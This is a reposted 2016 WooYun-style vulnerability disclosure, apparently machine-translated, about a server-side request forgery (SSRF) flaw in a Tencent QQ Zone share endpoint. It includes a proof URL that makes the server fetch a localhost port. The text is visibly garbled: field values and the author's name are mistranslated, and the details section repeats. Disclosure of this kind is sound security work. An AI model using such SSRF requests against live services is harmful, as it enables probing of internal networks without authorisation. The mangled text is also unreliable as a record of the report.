QQ空间某处SSRF
漏洞标题 QQ空间某处SSRF 相关厂商 腾讯 漏洞作者 包包 提交时间 2016-06-28 15:32 公开时间 2016-06-28 17:05 漏洞类型 网络设计缺陷/逻辑错误 危害等级 中 …
漏洞标题
在QQ空间SSRF的某个地方
相关制造商
腾讯
漏洞作者
袋
提交时间
2016-06-28 15: 32
公共时间
2016-06-28 17: 05
漏洞类型
网络设计缺陷/逻辑错误
危险等级
在
自我评估等级
五
漏洞状态
该漏洞已通知供应商,但供应商忽略了该漏洞
标签标签
漏洞详细信息
问题出在这里。
长话短说。
此时,我请求了这样一个js文件。
http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&url=http://127.0.0.1: 8081 /& g_tk=2109654981
而已。
漏洞证明:
修理计划:
过滤源地址,我不太清楚如何描述此修复。看到猪兄弟总是如此。
版权声明:请注明包装的来源@乌云
长话短说。
此时,我请求了这样一个js文件。
http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshareget_urlinfo?fupdate=1&url=http://127.0.0.1: 8081 /& g_tk=2109654981
而已。
漏洞证明:
修理计划:
过滤源地址,我不太清楚如何描述此修复。看到猪兄弟总是如此。
版权声明:请注明包装的来源@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 509 )
- 分类:黑客技术
